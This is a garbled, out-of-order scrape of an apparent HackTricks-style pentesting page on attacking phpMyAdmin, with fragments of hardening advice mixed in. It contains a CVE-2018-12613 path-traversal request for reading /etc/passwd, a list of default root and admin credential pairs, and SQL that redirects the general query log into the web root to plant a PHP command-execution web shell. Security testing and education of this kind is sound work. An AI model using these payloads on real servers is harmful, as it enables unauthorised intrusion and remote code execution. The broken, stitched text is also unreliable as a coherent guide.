Phpmyadmin - Hacktricks

From simple misconfigurations like default credentials to critical vulnerabilities like CVE-2018-12613, phpMyAdmin remains a persistent target for attackers. By understanding the attack paths outlined in this guide, system administrators can better prioritize their defenses, while penetration testers can leverage these techniques to assess the security posture of their clients. The key takeaway is that exposing an unhardened phpMyAdmin instance to the internet is a significant risk that can quickly lead to complete system compromise.

: He used a SQL command to write a simple "web shell" into the web root: "" "/var/www/html/shell.php" Use code with caution. Copied to clipboard Command Execution : By visiting ://example.com , he confirmed he was running commands as the The Lesson

7.2. Authentication & Access Control

Before launching an attack, you need to identify if phpMyAdmin is present.

Ensure the MySQL user used by phpMyAdmin does not have the FILE privilege. phpmyadmin hacktricks

Check for publicly accessible files like /README , /ChangeLog , or /Documentation.html .

7.5. Keep Software Updated

Many installations rely on standard administrative credentials. Common pairs include: root : blank (no password) root : root root : password admin : admin Brute Force Attacks

/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../etc/passwd : He used a SQL command to write

SET GLOBAL general_log = 'ON'; SET GLOBAL general_log_file = '/var/www/html/shell.php'; SELECT "<?php system($_GET['cmd']); ?>" -- Now every query is logged to shell.php. Trigger it.